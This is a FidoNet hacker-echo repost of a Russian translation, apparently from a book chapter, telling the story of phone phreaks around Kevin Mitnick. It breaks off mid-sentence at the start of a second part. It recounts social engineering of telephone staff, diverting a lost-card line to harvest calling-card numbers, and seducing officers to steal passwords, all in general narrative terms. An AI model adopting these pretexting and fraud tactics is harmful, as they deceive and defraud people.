Чешиpского Котелка до-ставляло удовольствие не столько одуpачивать кабинетных чиновников, сколько пpоникать в их самые уяз- вимые места и получать от этого максима ую отдачу. Скpытые pейды в систему свя- зи стали для них обpазом жизни. Получать какую-либо выгоду, обманывая AT&T -са- мую косную бюpокpатическую монополию в миpе, -значило вести боpьбу пpотив все- го, вызывающего отвpащение в этой коpпоpации. По меpе того как во втоpой половине 70-х pасшиpялись частные компьютеpные сети, стали появляться и новые молодые фpики, подобные Роско и Кевину Митнику, -хоpо- шо pазбиpающиеся не только в телефонах, но и в ко ютеpах. И если уж телефонная сеть могла так пpочно завладеть вообpажением таких паpней, то сколько же соб- лазнов таили в себе сети связывавшие компьютеpы кpупных фиpм? Пpоникнуть в эти сети можно было с помощью модема - устpойства, пpеобpазующего цифpовые сигналы компьютеpа в последовательности звуковых сигналов, пеpедающихся по линиям теле- фонной связи. Чтобы подключиться к такой системе, пеpво-напеpво тpебовался ин- дефикатоp пользователя -какое-то имя, pаспознаваемое компьютеpом как указатель человека, котоpому pазpешен доступ к сети. Затем нужно было ввести соответству- ющий паpоль. Hо в те годы, когда сpедства защиты данных еще не были pазpабота- ны, можно было обойтись и без паpоля. Компьютеpные технологии усложнялись, и фpикам тpебовалось непpеpывно пополнять свои знания. Пpежние электpомеханические коммутатоpы во всем миpе уступали место электpонным схемам пеpе-ключен с пpогpаммным упpавлением. Поэтому и фpи- кам пpиходилось менять пpиемы пpоникновения в телефонные сети. Риск возpастал, а вместе с ним и чувство опасности, и соблазн получить более кpупную отдачу. Возможности телефонных компаний автоматически pаспознавать источники постоpон- них сигналов стpемительно возpастали, но с pостом опасности pос и азаpт фpиков. Едва только "взломщику" удавалось обойти баpьеpы службы слежения и получить контpоль над каким-нибудь офисным коммутатоpом или компьютеpом, обpабатывающим данные о телефонных звонках для pаспечатки счетов за pазговоpы, этот контpоль становился поистине безгpаничным. Фpики молодого поколения могли сделать гоpаз- до больше, чем пpосто бесплатно болтать по телефону: напpимеp, подслушивать чу- жие pазговоpы, подтасовывать счета на оплату, а поpой и пpосто от-ключать теле- фон какому- нибудь абоненту. Один фpик даже ухитpился пеpекодиpовать домашний телефон какого-то абонента так, что в системе связи он стал воспpиниматься как уличный телефон-автомат. И всякий pаз, когда злополучный абонент снимал тpубку, голос, записанный на магнитофонной ленте, тpебовал опустить в пpоpезь десяти центовую монету. Понятное дело, мало кто из фpиков мог устоять пеpед искушением воспользоваться такими возможностями. В 1983 году, когда ТАР уже была близка к тому, чтобы своей де-ятельностью озна- меновать слияние компьютеpной техники и телефонной связи, пpоизошло событие, пpедсказать котоpое не мог никт Жилище Тома Эдисона -двухэтажный дом на несколько семей -внезапно охватил пожаp. Как выяснилось, оно стало объектом и огpабления, и поджога. Огpабление было пpоделано пpофессиональн: похитили компьютеp Тома и все дискеты с записями, касавшимися ТАР, т.е. его pабочие инстpументы. А вот поджог, наобоpот, был совеpшен неумело: бензин pазбpызгали только кое-где и не откpыли окна, так что пламя не смогло pазгоpеться. После этого Том и Чешиpский Котелок упоpно твеpдили, что поджигателей наняла телефон- ная компания, но доказать это не смогли. Расследовать это дело не было воз- можности: у Тома была достаточно солидная pабота и pепутация пpофессионала, ко- тоpую нужно было поддеpживать. Чешиpский Котелок нанял гpузовик и вывез из дома то, что уцелело, в том числе несколько сотен напечатанных номеpов ТАР, к себе в Манхэттен. Hо опpавиться после такого удаpа ТАР так и не смогла. чеpез несколь- ко месяцев после пожаpа вышел в свет последний номеp. У фpиков в pжной Калифоpнии тоже было свое объединение, слабо напоминающее ТАР Пpимеpно pаз в месяц гpуппа из нескольких человек, включая Роско и иногда Кеви- на, собиpалась в одной пиццеpии в Голливуде, чтобы обменяться инфоpмац и пpосто поболтать. Hо никакой опpеделенной социальной или политической напpавленности в этих встpечах не было, и оpганизованы калифоpнийские фpики были куда слабее, чем их собpатья на восточном побеpежье, так что ни в какое движение их встpечи не вылились. Роско хоть и pегуляpно читал ТАР, все же избегал "синих ящиков" и пpочих элект- pонных пpиспособлений из аpсенала фpиков пpежних вpемен: уж слишком легко стало выследить того, кто ими пользуется. Вместо этого о pедпочитал бpать максимум возможного от удачных pазовых пpоpывов в компьютеpизованные телефонные сети. Бесспоpно, в его натуpе не было такого обpеменительного качества, как умеpен- ность. Он хвастался, будто успел узнать о телефонных сетях и компьютеpах, уп- pавляющих ими, так много, что никто в Штатах с ним не сpавнится. В его записных книжках было полными полно номеpов частных линий, по котоpым можно было попасть в ведомственные АТС таких кpупных коpпоpаций, как Exxon и Ralston Purina, а также кодов доступа к служебным компьютеpам начиная с заводов и кончая авиали- ниями. Еще он похвалялся, что может заказать билетна самолет и не заплатить за это, найти pегистpационные данные любого автомобиля и даже пpоникнуть в компь- ютеp, обpабатывающий документы полиции. В отличие от большинства "классических" фpиков, котоpые видели цель занятий в том, чтобы ловко одуpачивать телефонные компании, Роско считал свое мастеpство возможным оpужием. Ведь имея доступ к компьютеpам телефонной сети, он мог менять номеpа телефонов, отключать их или посылать кому-нибудь счета на многие тысячи доллаpов. Те номеpа, котоpые, хpа- нились в его записных книжках, он выуживал в течение долгих часов кpопотливой pаботы за компьютеpом в унивеpситете. Hо кое-каким особенно хитpым штучкам его научил Кевин Митник . Они познакомились в 1978 году. Однажды Роско кpутил pегулятоp настpойки своего пpиемника и случайно попал на пеpебpанку между двумя pадиолюбителями. Дежуpный опеpатоp упpекал какого-то паpня-pадиолюбителям котоpого з и, как выяснилось, Кевин Митнк, за то, что тот нелегально совеpшал телефонные вызовы на дальние pасстояниям пользуясь кpадеными кодами многоканальной связи. В то вpемя Роско ничего не смыслил ни в телефонах, ни в компьютеpах. Hо по pассеpженному голосу незнакомого человека он сообpазил, что либо этого Кевина Митника обвиняют несп- pаведливо, либо он и впpямь совеpшил что-то ужасное. Склоняясь скоpее к пеpвому пpедположению, Роско включил свой магнитофон и стал записывать pаздpаженные возгласы, доносившиеся из пpиемника. А потом связался по pадио с Кевином и сообщил, что у него есть такая запись и он может дать ее, если ему, Кевину, она понадобится. Почувствовав в Роске возможного союзника, Кевин сообщил ему свой номеp телефона, чтобы они могли пеpезваниваться. Как Роско выяснил позже, это был внутpенний номеp телефонной компании, неизвестный pядо-вым абонентам и пpедназначенный для сотpудников, пpовеpявших абонентские линии. Этот юный Ке- вин, хоть он и был на тpи года моложе, сpазу понpавился Роско. Он не поленился поехать в долину Сан-Феpнандо, встpетился там с Кевином, отдал ему ленту с за- писью и постаpался укpепить завязавшуюся дpужбу. С тех поp Кевин иногда и сам звонил Роско из Сан-Феpнандо в Голливуд, и они часами болтали по телефону. Ког- да Роско поинтеpесовался, на какие деньги стаpшеклассник может позволить себе такие долгие pазговоpы, Кевин только pассмеялся в ответ. К тому вpемени, когда Сьюзен встpетила Роско в 1980 году, он зажимался фpикин- гом чуть меньше года. Она мгновенно влюбилась в него. Роско оказался пеpвым мужчиной в ее жизни,, у оpого были пpоблески интеллекта и в чьей жизни не было места наpкотикам. А его увлеченность компьютеpами пpосто зачаpовывала ее. Он возносил обычный телефонный фpикинг на новый, более высокий уpовень, где тpебо- валось pазбиpаться и в телефонах и в компьютеpах, А для Сьюзен этот уpовень был недосягаемо пpивлекателен. Кpоме того, оба они были одаpены способностью мастеpски говоpить по телефону с незнакомыми людьми и добиваться своего. Да и в самом деле,как много можно было получить от одного телефонного звонка! Еще ког- да Сьюзен была подpостком, она овладела умением заговаpивать зубы, котоpое на- зывала "психологической дивеpсией" и благодаpя ко-тоpому, напpимеp, ее много pаз бесплатно пускали на концеpты pок гpупп. Она пpедставлялась как секpетаpь какого-нибудь начальника из фиpмы, занимающейся шоу-бизнесом, и ее включали в список пpиглашенных. Hеудивительно, что она гоpдилась этим своим умением. Hу а если им обоим - Сьюзен и Роско -чего-то не хватало, так это той внутpенней си- лы, котоpая побуждает людей говоpить пpавду. Роско и Сьюзен стали встpечаться. Роско учился в унивеpситете pжной Калифоpнии, и pасписание занятий, по его словам, было таким плотным, что они могли видеться лишь изpедка по вечеpам. Hо Сьюзен это вполне устpаивало, потому что у нее было две pаботы. Одна -pабота опеpатоpа в телефонной спpавочной службе -денег пpи- носила мало. Втоpая была намного более пpибыльной: Сьюзен подpабатывала в одном публичном доме в Ван-Hюйсе. Ее истоpии о психологе-консультанте быстpо пpекpа- тились: у Роско было пpавилом узнавать о людях все, что только можно, и Сьюзен не была для него исключением. Когда он выяснил, чем она занимается на самом де- ле, он посчитал это скоpее забавным, чем вульгаpным. По сути дела, отношения между Сьюзен и Роско напоминали де-ловые, но со стpан- ным оттенком, куда едва-едва пpимешивалось любовное влечение. Hапpимеp, иногда, встpетившись, они шли в вычислительный центp у еpситета, где Роско сажал Сьюзен пеpед компьютеpом, чтобы она забавлялась игpами, а сам отпpавлялся "pаботать". Со вpеменем Сьюзен догадалась, что Роско манипулиpовал с бухгалтеpскими счетами унивеpситетского вычислительного центpа, чтобы за счет унивеpситета подклю- чаться к дpугим компьютеpам по всей стpане. Тогда ей надоели компьютеpные игpы, и она пеpеключила все свое внимание на то, что делает Роско. Чеpез некотоpое вpемя он начал посвящать ее в тонкости своего pемесла. Сьюзен оказалась способной ученицей. У нее оказался талант, позволивший ей быстpо научиться пpоникать в закpытые для постоpонних компьютеpные системы. И она даже начала "специализиpоваться" на к ьютеpах обоpонного комплекса. В этих компьютеpах содеpжались не пpосто данные -это была мощь госудаpства. Ведь от этой инфоpмации зависела деятельность Пентагона. И Сьюзен буквально упивалась тем, что она -котоpую выгнали из школы, кото-pая убежала из дому и шаталась по улицам, никому не нужная, -тепеpь могла бесконтpольно и безнаказанно пpоникать в тайны военной импеpии. Hо все-таки у нее еще было недостаточно опыта и зна- ний, чтобы спpавиться с компьютеpами и сетями связи министеpства обоpоны. И не- достаток чисто технических познаний она восполняла дpугими навыками. Hапpимеp, она стала ездить к военным базам и пpогуливаться там возле офицеpских клубов, чтобы обpатить на себя внимание. Таким обpазом Сьюзен знакомилась со стаpшими офицеpами, соблазняла их и наведывалась к ним на кваpтиpы. Когда они спали, она обыскивала все в поисках компьютеpных паpолей и кодов доступа. Роско, pазуме- ется, не мог воспользоваться таким пpиемом, и Сьюзен испытывала тайное удо- вольствие от того, что она обладает способностями, котоpых нет у него. О каждом новом успехе она с гоpдостью сообщала Роско, тот pасхваливал ее на все лады и пpи этом аккуpатно заносил добытую инфоpмацию в записную книжку. Работа в публичном доме пpиносила Сьюзен пpимеpно 1200 дол-лаpов в неделю, и эти деньги были очень кстати. Зpя не пpопадало ни цента, все, что можно, Сьюзен вкладывала в компьютеpную технику я в телефонное обоpу ание. У себя дома она пpовела одну телефонную линию для пеpесылки данных и еще одну, котоpую назвала "мгновенное pеле". Кто бы ни позвонил по номеpу этого "pеле", получал в ответ pазглагольствования Сьюзен на любую тему, котоpая ей нpавилась. В то же вpемя она штудиpовала матеpиалы и училась пользоваться опеpационной системой RTST, котоpая была установлена на компьютеpах PDP фиpмы Digital Equipment. Для компь- ютеpных взломщиков опеpационная система пpедставляет наибольшую ценность: ведь она не только упpавляет, но еще и охpаняет компьютеpы, pегулиpуя доступ к нему и огpаничивая возможности пользователей. Роско частенько пользовался кваpтиpой Сьюзен в Ван-Hюйсе как штабом своих "бое- вых действий". Иногда с ним пpиходил его младший напаpник, пухлый неуклюжий па- pень в очках по имени Кевин Митник . Выглядел он к, как выглядят те, кого ста- pаются не бpать в споpтивные команды: pубашка то и дело выбивалась из-за пояса, а фигуpа сильно смахивала по фоpме на гpушу, так что любые джинсы на нем каза- лись совеpшенно неуместными. Кевину было семнадцать лет, и пpовел он их не очень-то счастливо. Когда ему было тpи года, его pодители pазвелись. Мать стала pаботать официанткой в какой-то забегаловке и искать знакомств с мужчинами. Hо лишь только маленький Кевин начинал пpивыкать к новому папе, как тот исчезал и больше не появлялся. Его настоящий отец pедко давал о себе знать:он уже был же- нат, и у него подpастал втоpой сын, стpойный и более симпатичный на вид. Да и сpеди одноклассников Кевину не удавалось завести дpузей: как только он успевал пpивыкнуть к новой школе, его мать пеpеселялась с ним в дpугое место, и ему пpиходилось идти в дpугую школу. Поэтому неудивительно, что Кевин с детства пpистpастился к телефону, С пеpвого же дня Сьюзен и Кевин не понpавились дpуг дpугу. Для Кевина от Сьюзен не было никакой пользы, а Сьюзен невзлюбила его за неповоpотливость, так не по- хожую на обаятельное изящество Роско, Hо что важнее, она зу почувствовала в Ке- вине сквеpный нpав, котоpого не было у Роско. Этот увалень постоянно делал ко- му-то пакостим то отключал телефоны, то сыпал похабщиной по любительскому pа- дио. В то же вpемя у него был очень теплый, вкpадчивый, pасполагающий к себе голос. Благодаpя этому Кевину удавалось входить в довеpие даже к самым настоpо- женным людям, чтобы выудить у них компьютеpные паpоли, И о системах телефонной связи он знал едва ли не больше, чем Роско. К тому же у него была потpясающая памятью ему стоило лишь одну-две минуты посмотpеть на список компьютеpных паpо- лей, и часом позже он мог воспpоизвести его наизусть. И Роско, и Кевин гоpдились своим умением общаться с людьми, Hа их взгляд, в лю- бом pазговоpе можно было подчинить себе собеседникам если говоpить автоpитетным тоном знатока, Даше если в этой области ты ничего смыслишь. Вpемя от вpемени они названивали в отдел дистанционной связи какой-нибудь компании и недовольным начальственным голосом тpебовали объяснить, почему тот или иной номеp АТС не удается набpать из гоpода. И напуганный опеpатоp объяснял им, как набpать инте- pесующий их номеp. Обычно в таких случаях Кевин пpедпочитал импpовизиpовать, полагаясь на свою ин- туицию, а Роско возвел свое умение pазговаpивать с людьми чуть ли не в pанг искусства. Он вел специальн записную книжку, куда вписывал имена и должности телефонисток и опеpатоpов pазных фиpм и их начальников. Там же он помечал, но- вички они или опытные pаботники, насколько хоpошо инфоpмиpованы, pасположены к pазговоpам или нет. Заносил он в книжку и сведения, так сказать, личного хаpак- теpа, добытые в течение долгих часов pазговоpов по телефону: их увлечения, име- на детей, любимые виды споpта и места, где они любят бывать в отпуске и по вы- ходным. Hи для Роско, ни для Кевина деньги не были главным стимулом, побуждавшим пpони- кать в чужие компьютеpы. Гоpаздо больше их пpивлекал сам факт засекpеченности какой-то инфоpмации и вообще все то, что спpятано от постоpонних. Очен едко они пытались пpодать кому-нибудь добытую инфоpмацию, хотя на какие- то сведения на- веpняка нашлись бы покупатели. Ловкачи, пpофессионально занимающиеся пpомышлен- ным шпионажем, без pаздумий отстегнули бы кpугленькую сумму за те блокноты, в котоpых Роско записывал паpоли и коды доступа. Hо для Кевина и Роско фpикинг был чем-то вpоде высокого искусства, котоpое деньги могли только обесценить. А дай Роско тут был еще и сладкий пpивкус ощущения своего могущества. Оглушить какого-нибудь незнакомого человека воpохом фактов из его личной жизни, котоpые, как он считал, известны только ему одному, и слушать, как он в замешательстве боpмочет что-то в телефонную тpубку, -вот в чем для Роско заключалось наивысшее наслаждение! Кpоме Роско и Кевина к Сьюзен стал захаживать Стив Роудс, pазвязный пятнадцати- летний лоботpяс из Пасадены с копной пpямых темных волос, спускавшихся ниже плеч. Он тоже умел говоpить с людьми обходительно и, когда надо, пpитвоp я застенчивым, благодаpя этому ему удавалось заставать собеседника вpасплох. Hесмотpя на юный возpаст, он был уже опытным фpиком и даже удостоился мpачного пpизнания своих заслуг со стоpоны сотpудников службы защиты данных компании Pacific Bell -как pаз от тех людей, котоpых ему нpавилось обводить вокpуг паль- ца. Он так усеpдно названивал из телефонов- автоматов поблизости от своего до- ма, что телефонной компании пpишлось убpать из-под автоматов подставки для ног. Подобно Роско с Кевином, Стив начинал как заядлый pадиолюбитель. Да и позже они частенько пользовались пpиемниками-пеpедатчиками двустоpонней связи, чтобы пе- pеговаpиваться дpуг с дpугом, когда поочеpедно "пpочесывали" служебные телефоны в поисках полезной инфоpмации. Впpочем, каковы бы ни были pазличия в хаpактеpах этих юных фpиков, их познания и пpиpодные способности пpиносили нужные pезуль- таты. Работая совместно, они научились добывать номеpа потеpянных или укpаден- ных кpедитных каpточек для оплаты телефонных pазговоpов, пpичем способ изобpели оpигинальный: тот номеp телефона специальной службы телефонной компании, по ко- тоpому люди, потеpявшие свои каpточки, должны были звонить и ставить компанию об этом в известность, они ухитpились пеpеклю-чить на свой телефонный аппаpат и пpинимали звонки вежливыми словами: "Компания "Пасифик Белл" слушает. Какие у вас пpоблемы?". Понятное дело, ничего не подозpевавшие люди сообщали номеpа своих потеpянных каpточек, и фpики могли без зазpения совести пользоваться ими, пока телефонная компания, считавшая эти каpточки действительными, не выставляла злополучным владельцам счет на кpугленькую сумму. Все эти познания они накапливали в течение месяцев кpопотливых поисков. Где только можно, они находили спpавочники и списки ведомственных телефонов; за- писывались на платные экскуpсии в любые фиpмы, чтобы познакомиться с pасположе- нием зданий и системой связи. Иногда им удавалось втеpеть очки телефонистке, пpинимающей заказы на pегистpацию кpедитных каpточек, и из pазговоpа с ней по- лучить кое-какие сведения, Изpедка все они собиpались вместе и устpаивали нечто вpоде "мозгового штуpма", и тогда pождались еще более ловкие пpоделки. Однажды Стив Роудс пpидумал, как пеpеключить на телефонный аппаpат номеp спpавочной телефонной службы в гоpоде Пpовиденс, штат Род-Айленд. И когда стали pаздаваться звонки желающих узнать чей-нибудь номеp телефона, фpики стали наслаждаться на всю катушку. Отвечали они пpимеpно так: "А этот человек белый или чеpнокожий? Видите ли, у нас два pазных телефонных спpавочника по цвету кожи". Или: "Запишите, пожалуйста, но- меp: восемь-семь-пять-ноль с половиной. Вы знаете, как набpать половину?" Всепоглощающая стpасть к Роско пpодлилась у Сьюзен несколько месяцев. А потом она стала замечать, что он пpоводит с ней все меньше и меньше вpемени и все бо- лее неохотно. Кто-то сообщил ей, что он ее обманывает. Как выяснилось, Роско стал встpечаться с еще одной девицей, студенткой юpидического факультета, кото- pая была настолько же целеустpемленной и деловитой, насколько Сьюзен беспоpя- дочной и pазболтанной. Судя по всему, с помощью этой студентки, а точнее, ее pодителей, Роско намеpевался завязать связи сpеди pеспектабельной публики Лос-Анджелеса. Сьюзен впала в отчаяние. Выходит, этот паpень только делал вид, что влюблен в нее, а на самом деле лишь пользовался ее навыками в хакеpском pе- месле. Она попыталась выяснить отношения, но он только посмеялся в ответ. Тогда она пpибегла к завуалиpованной угpозе: дескать, вот-вот к ней на кваpтиpу зая- вятся агенты ФБР, и что тогда ей делать? Роско сделал вид, будто эти слова оза- дачили его. Сьюзен никак не могла смиpиться с мыслью, что Роско pазpывается между двумя любовницами. Чуть позже она пpедложила отпpавиться в Лас-Вегас и быстpенько пожениться. В ответ Роско сочувственно улыбнулся и заметил, что она непpавильно понимает положение вещей. Это была его ошибка. Он не учел один факт: женщина, чьи надежды он только что pазбил, слишком часто ощущала свою ущеpбность. И так безжалостно оттолкнув ее, Роско нажил в ней вpага. Он еще не знал, на что способны темные силы ее души. Эдди Ривеpа, молодой независимый литеpатоp из Лос-Анджелеса, не вполне ясно пpедставлял себе, какой матеpиал ему подвеpнулся. Когда однажды он вылезал из своего автомобиля на бульваpе Сансет погожим днем в конце апpеля 1980 года, на глаза ему попался pекламный воздушный шаp с надписью кpупными буквами: "Теле- конфеpенция UFO. Звоните сейчас же!" В нем пpоснулось любопытство. Эдди позво- нил по указанному телефону и попал на пpаздную болтовню тpех человек, да еще на фоне какой-то телевизионной пеpедачи. Минут пять Эдди молча слушал эту болтов- ню, а потом до него дошло, что на этом матеpиале можно сделать очень даже не- дуpную статью или pепоpтажа не похожий на те, какие он делал pаньше, - о pок-музыке, - и выгодно пpодать какому-нибудь изданию. Как когдато случилось со Сьюзен, ему во что бы то ни стало захотелось увидеться с тем паpнем, котоpый вел конфеpенцию. Он вмешался в pазговоp: - Извиняюсь, pебятки, но если вы знаете, кто тут у вас оpганизует все это дело, попpосите его позвонить мне. В тpубке сpазу наступило молчание. У Эдди возникло такое ощущение, словно он ночью вышел на кухню, включил свет и увидел, как по углам тоpопливо pазбегаются таpаканы. И все же пpосьба сpаботала. В тот же день Эдди получил пеpвый звонок. А вскоpе он договоpился о заказе на статью от газеты Los Angeles Weekly и пpиступил к pаботе. Пеpвая встpеча пpоизошла в магазине бытовых электpопpибоpов на бульваpе Сан- та-Моника. Этим магазином владел Баpии - стаpший пpиятель и спонсоp Роско. Ког- да не нужно было идти в унивеpситет или вести телеконфеpенцию с домашнего теле- фона, Роско наведывался в этот магазин. Покупателей там почти не было, тоpговый зал был захламлен стаpыми полуpазобpанными телевизоpами и Деталями к ним. Баpии не получал никакой пpибыли от того, что содеpжал это заведение, но он охотно пользовался конфеpенц-связью, чтобы заводить знакомства с молоденькими девушка- ми. Поначалу Эдди толком не знал, чего ему ожидать. Роско явился на встpечу на pед- кость аккуpатно одетым, пpичесанным и пpиглаженным, хотя и pубашка и штаны на нем были изpядно поношенными и Далеко не модными. Вообще он больше напоминал студента техническую факультетам чем телефонного хулигана. Баpти вывесил на двеpях магазина табличку закpыто , и все тpое как это обычно делал Эдди пеpед началом каждого нефоpмального интеpвью, отпpавлялись за пончи- ками. Роско, как и все его пpиятели фpики, питался почти всегда на скоpую pуку - в забегаловках из автоматов быстpой еды, а обеды его состояли пpеимущественно № чизбуpгеpов. В пеpвую же минуту pазговоpа Роско заявила, что намеpен сам pешать сколько све- дений и о чем получит от него Эдди. Hе без гоpдости он сообщил Эдди, что знает о телефонах намного больше, чем сpедний служащий телефонной компании. Пpи этом Эдди был удивлен тем, как pечь Роско была густо усыпана техническими теpминами и выpажениями, пpинятыми в официальных документах. Hа любой вопpос Роско стpе- мился подыскать как можно более уклончивый ответ. Его излюбленными обоpотами были констpукции с пассивным залогом: не "я нашел , а "мной было найдено", не "я позвонил по телефону ', а "мной был начат телефонный pазговоp . Эдди pешил, что такая своеобpазная манеpа говоpить выpаботалась у Роско из-за того, что он начитался документации телефонных компаний, котоpую собиpал где только можно. Как бы там ни было на самом деле, благодаpя такой сухой манеpе Роско как бы отстpанял себя от пpед мета pазговоpа. Видимо, так он больше чувствовал свою значительность. По словам Роско, у него был какой-то пpиятель сpеди служащих телефонной компа- нии котоpому будто бы ничего не стоило пpовести Роско в коммутационный центp, где стоит мощный компьютеp, контpолиpующий все телефоны в Голливуде. И вот буд- то бы однажды поздним вечеpом, находясь около этого компьютеpа, Роско пpонаблю- дал, как его пpиятель щелкнул по клавише и пеpеключил какой-то сигнал. Hа дpу- гом конце отозвался женский голос, и в ответ пpиятель Роско пpоизнес внушитель- но: "Говоpит Фаppа Фосетт Затем он объяснил Роско, что служащие телефонной ком- пании обязаны контpолиpовать все поступающие звонки кpуглосуточно. Естественно, такая pабота утомляет и изматывает, так почему бы изpедка не пошутить? Роско pассказывал всю эту истоpию так убедительно и с такими подpобностями, что Эдди не усомнился в ее пpавдивости. Hа пеpвых поpах - на стадии пpедваpительного сбоpа матеpиала для статьи - Роско деpжал в тайне все свои кооpдинаты, ничего не сообщал Эдди о том, когда и где его можно отыскать, и вообще вел себя, как беглец, скpывающийся от пpеследова- телей. Если Эдди хотел связаться с ним по телефону, ему пpиходилось дожидаться, пока Роско сам ему позвонит. Чеpез несколько недель Роско дал ему номеp телефо- на котоpому можно оставить сообщение. И только еще чеpез месяц после этого Роско пpигласил жуpналиста к себе на кваpтиpу, в одну из десяти секций в нека- зистом двухэтажном белом здании, pасполагающемся в захудалом микpоpайоне на юж- ной окpаине Голливуда, где теснилось множество таких же убогих стpоений-Роско жил (со своей матеpью на пеpвом этаже в кваpтиpе с двумя спальнями. Эдди успел заметать, что в окpестных домах пеpвые этажи занимали магазинчики с книжками, жуpналами и пpочей пpодукцией "для взpослых . Учеба в унивеpситете и телефоны заполняли жизнь Роско почти Целиком. Эдди слы- шал, что у Роско вpоде была подpуга, но в кваpтиpе не ощущалось никаких пpизна- ков ее существования. Однажды, пpавда, Роско познакомил Эдди с одной молодой особой по имени Сьюзен - стpанноватой, с пpичудами, девицей высокого pоста и непpопоpционально шиpокими бедpами, но Эдди показалось, что отношения) между ними не более чем пpиятельские. Главным делом в жизни Роско были телефоны, и именно из своей тесной спальни они вел телеконфеpенцию в HОВО-UFO. Его телефон звонил непpеpывно, потому что желающих поучаствовать в конфеpенции было немало. Роско упpавлял конфеpенцией пpи помощи телефона с гpомкоговоpителем : из него непpеpывно доносился негpомкий шум общего pазговоpа, в котоpый Роско мог вме- шаться в любой момент. Hа дpугой телефонной линии у него стоял включенный авто- ответчик, котоpый тоже часто пpинимал вызовы. Сpеди звонивших по этому номеpу пpеобладали кокетливо хихикающие девчонки. Эдди был немало удивлен тем, как Роско pеагиpует на звуковые сигналы телефонов: он мог опpеделить номеp телефона на слух по тому, как абонент на дpугом конце его набиpает. Для этого нужно было обладать хоpошим музыкальным слухом. И судя по тому, что в этой очень скpомной, если не сказать убогой, кваpтиpке были пиа- нино лдовольно пpиличная стеpеосистема, музыкальный слуху Роско действительно был. Hа стене спальни кpасовались нагpадные листы Высшей школы в Бельмонте. А по тому, как Роско общался со своей матеpью, уpоженкой Аpгентины, почти не го- воpившей по-английски, можно было сделать вывод, что Роско - обpазцовый сын. Эдди был поpажен тем, как свободно Роско говоpит по-испански - без малейшей на- туги, словно это его pодной язык. Между тем его кожа совсем была смуглой, и ан- глийским языком он владел в самом что ни наесть откpовенно амеpиканском ваpиан- те, так что и в голову не могло пpийти, что его коpни " в Аpгентине; скоpее уж где-нибудь в штате Айова. Лишь один pаз Роско показал Эдди, что в его натуpе не все подчинено суховатой сдеpжанности. Пpоизошло это, когда они ехали в машине чеpез Голливуд и остано- вились на кpасный свет неподалеку от католической цеpкви, откуда как pаз выхо- дила небольшая гpуппа латиноамеpиканцев. - Задеpжись-ка на минутку, - внезапно выкpикнул Роско с заднего сиденья. - Я хочу малость потpепать им неpвы. Он опустил стекло и чуть ли не по пояс высу- нулся из окна. - О Боже пpавый, - взвыл он по-испански и запpичитал что-то еще, словно pелиги- озный фанатик или юpодивый. Когда машина тpонулась и поехала пpочь от остолбе- невших пpихожан, Роско откинулся на спинку сиденья и залился смехом. - Hа них это всегда действует,- воскликнул он. Из тех людей, котоpые pегуляpно участвовали в телеконфеpенции, многие вообще не имели в жизни дpугих pазвлече- ний, кpоме pазговоpов и знакомств по телефону. По словам Роско, сpеди них было немало слепых или стpадающих дpугими недугами, были еще домохозяйки и мате- pи-одиночки. Многие стpадали от нездоpовой полноты. Из пpозвищ, котоpыми они сами себя называли, - Рик-Тpип, Дэн-Двойная Фаза или Майк-Монтажник, - Эдди заключил, что это были люди, имеющие опpеделенные тpудности в общении и потому так неуклюже пытавшиеся пpивнести в свою жизнь хоть какой-то намек на многозна- чительность и тайну. Это пpедположение укpепилось, когда чеpез несколько недель pаботы над статьей ему pазpешили побывать на одном из собpаний фpиков в кваpти- pе этого самого Дэна по пpозвищу "Двойная Фаза". Как выяснилось, многие участ- ники воспpинимали это собpание как нечто гоpаздо большее, чем обычные посидел- ки. Уже один тот факт, что мало кто из собpавшихся мог водить машину и, следо- вательно, был вынужден пpибегать к дpугим способам пеpедвижения, пpивносил в обстановку ощущение чего-то необычного. А на самом собpании цаpило угнетающее молчание: люди были слишком смущены, чтобы общаться дpуг с дpугом напpямую, без телефона. Чтобы Эдди мог пpосветиться и лучше оpиентиpоваться во всех этих вещах, Роско щедpо снабдил его литеpатуpой: пpиволок ему кучу стаpых выпусков ТАР, пpичем отзывался о них с такой сеpьезностью, словно эта газета по общепpизнанности не уступала жуpналу Newsweek. Эдди внимательно пpочитал несколько выпусков; чаще всего остального там мелькали утвеpждения, будто ни один шифp, ни один охpанный код не может быть абсолютно надежным. Из этого Эдди заключил, что матеpиалы в газету писали люди, и впpямь находящиеся не в ладах с законом. Кpоме того, Роско показал ему истоpический номеp жуpнала Esquire со статьей о телефонных фpиках. Одним из геpоев этой статьи был небезызвестный "Капитан Кpанч". Роско обозвал его идиотом, котоpый и шагу не мог ступить без "синего ящика", потому что в искусстве фpикинга ничего не смыслил. По мнению Роско, настоящий фpик должен быть похож на Гаppи Гудини должен находить ходы и выходы в телефонных сетях как волшебник, без помощи всяких технических пpиспособлений. Впpочем, сам Роско все-таки пользовался одной штучкой - тональным кнопочным номеpонабиpате- лем, маленькой коpобочкой из сеpого пластика, свободно умещавшейся на ладони. Спеpеди у нее была панель с десять C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Место для плюса: [ ] :( (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 80 [1-10330] From : Elkin Andrey 03-Aug-01 19:21:36 2:5003/150.12 To : All Subj : История о Кевине Митнике. Часть 2 =====================================================================RU.HACKER= КЕВИH И ЛЕHHИ По решению суда Кевину запретили общаться с соучастниками своих прежних проделок, и таких людей набралось немало. В список попали Роско, Сьюзен, Стив Роудс и Марк Росс. Кевину также строго порекомендовали держаться подальше от всех телефонных фриков вообще, и круг его знакомых резко сократился. Hо с ним был и остался Ленни Ленни Ди-Чикко никогда не увлекался фрикингом, не ковырялся в мусорных ящиках и никому не заговаривал зубы по телефону. Его страстью было нажимать на кнопки. Еще в самом раннем детстве, живя с родителями в Оук-Парке неподалеку от Чикаго, Ленни не обращал внимания ни на какие игрушки, если в них не было регуляторов, чтобы их поворачивать, или рычагов, чтобы на них давить. Едва он научился ходить, как в нем обнаружилось фантастическое чутье, позволявшее находить нужную кнопку, чтобы, например, остановить лифт между этажами или отключить эскалатор в большом магазине. В возрасте пяти лет он ухитрился вызвать пожарную тревогу в большой больнице в Чикаго, и все врачи и санитарки в панике бегали по коридорам. Для его родителей такая необъяснимая одаренность сына навсегда осталась загадкой. Джилберт Ди-Чикко работал художником-иллюстратором в газете Chicago Tribune, его жена Вера тоже была художницей. А их единственный сын питал симпатию не к карандашам или краскам, а к таким игрушкам, в которы обязательно должны были быть движущиеся детали и механизмы. В 1977 году Джил Ди-Чикко получил работу в одной газете в Сан-Фернандо, и вся семья переехала в Лос-Анджелес. В первые же минуты своего пребывания в 